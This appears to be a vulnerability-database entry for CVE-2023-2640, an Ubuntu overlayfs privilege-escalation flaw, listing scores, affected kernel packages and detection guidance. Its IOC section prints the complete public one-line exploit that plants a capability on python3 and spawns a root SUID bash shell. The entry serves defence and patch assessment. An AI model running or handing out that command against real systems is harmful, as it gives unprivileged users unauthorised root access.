cbcvebase.
CVE-2023-2640
published 2023-07-26

CVE-2023-2640: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may…

Priority: P1 · 79 · high
CVSS 3.1: 7.8 (AV:L / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 15.78% (96.5th percentile)
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.

Affected

31 ranges, showing 25

Vendor      Product                          Version range    Fixed in
canonical   ubuntu_linux
debian      linux
ubuntu      linux
ubuntu      linux-aws
ubuntu      linux-aws-5.15
ubuntu      linux-aws-fips
ubuntu      linux-azure
ubuntu      linux-azure-5.15
ubuntu      linux-azure-fips
ubuntu      linux-fips
ubuntu      linux-gcp
ubuntu      linux-gcp-5.15
ubuntu      linux-gcp-fips
ubuntu      linux-gke
ubuntu      linux-gkeop
ubuntu      linux-hwe-5.15
ubuntu      linux-ibm
ubuntu      linux-ibm-5.15
ubuntu      linux-intel-iot-realtime
ubuntu      linux-intel-iotg
ubuntu      linux-intel-iotg-5.15
ubuntu      linux-kvm
ubuntu      linux-lowlatency
ubuntu      linux-lowlatency-hwe-5.15
ubuntu      linux-nvidia

Detection & IOCs (extracted from sources)

command: unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
path: /var/tmp/bash
  • Detect use of 'unshare' with '-rm' flags combined with overlayfs mount operations (lowerdir/upperdir/workdir) — this is the core primitive of the CVE-2023-2640 one-line exploit.
  • Alert on 'setcap cap_setuid+eip' being called on a copied interpreter binary (e.g., python3) inside a user-created directory — indicates capability-planting via overlayfs copy-up.
  • Monitor for creation of SUID bash binaries in world-writable temp directories (e.g., /var/tmp/bash with permissions -rwsr-xr-x owned by root), which indicates successful privilege escalation.
  • Alert on overlayfs mount operations where files with capabilities (CAP_SYS_ADMIN, CAP_SETUID) in the lower directory are copied to the upper directory — the core mechanism of both CVE-2023-2640 and CVE-2023-32629.
  • On July 28, 2023, a public one-line exploit for CVE-2023-2640 was disclosed via Twitter — monitor threat intel feeds for weaponized PoCs and scan for the exploit pattern in process command lines.
  • CVE-2023-2640 is exploitable when the Ubuntu kernel carries both commit c914c0e27eb0 and the SAUCE patch 'overlayfs: Skip permission checking for trusted.overlayfs.* xattrs' — check kernel version and patch state to identify vulnerable hosts.
  • The vulnerability requires the Ubuntu kernel to carry BOTH commit c914c0e27eb0 AND the Ubuntu-specific SAUCE patch for overlayfs xattr permission skipping — vanilla upstream kernels are not affected.
  • Containers running on vulnerable Ubuntu hosts are also at risk, not just the host itself — container workloads on Docker and Kubernetes are exploitable under certain conditions.
  • The exploit was demonstrated on Ubuntu 22.04.3 LTS running kernel 6.2.0-25-generic — patch assessment should include this specific kernel version.

CVSS provenance

Source          CVSS version   Score   Severity   Vector
nvd             v3.1           7.8     HIGH       CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv                            7.8     HIGH
vulncheck                      7.8     HIGH
vendor_debian                  7.8     LOW
vendor_redhat                  7.8     HIGH
vendor_ubuntu                  7.8     HIGH